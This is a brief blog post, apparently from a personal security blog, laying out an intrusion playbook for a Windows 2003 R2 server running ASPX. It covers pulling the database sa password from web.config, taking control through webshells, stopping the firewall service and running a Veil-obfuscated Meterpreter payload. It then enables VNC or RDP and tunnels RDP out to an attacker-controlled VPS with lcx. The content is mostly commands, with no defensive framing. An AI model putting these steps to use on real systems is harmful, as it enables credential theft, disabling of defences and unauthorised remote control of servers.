windows 2003 r2 aspx

by on under web
1 minute read

1>search web.config———> to find sa and sa password

2>choppper(or aspxspy)to connect db,get sa privilege

sometimes strong webshell (like aspxspy.aspx) cannot get system privilege with sa and pass,try:
1.use sa execute cmd in chopper
or
2.restart the system and try strong webshell like aspxspy.aspx

3>net stop sharedaccess

4>net stop policyagent

5>use sa pri run meterpreter(use veil to jail) payload

6>use meterpreter shell to open vnc or desktop

meterpreter>run vnc
or
meterpreter>background
msf>use post/windows/manage/enable_rdp

7>if 6 fail,use sa privileges(in chopper)to run:

victim:lcx -slave vps_ip vps_port victim_ip 3389
vps:lcx -listen vps_port 1234
vps:mstsc /console /v:127.0.0.1:1234  

Notice:normally,mstsc---->127.0.0.1:1234 is ok,sometimes exists connect num restrict,use it.in win7: need runas admin,and use:mstsc /console /v:127.0.0.1:1234 -admin
windows, aspx
Since March 2016 the 3xp10it.cc has been running
home
github
search
archive
category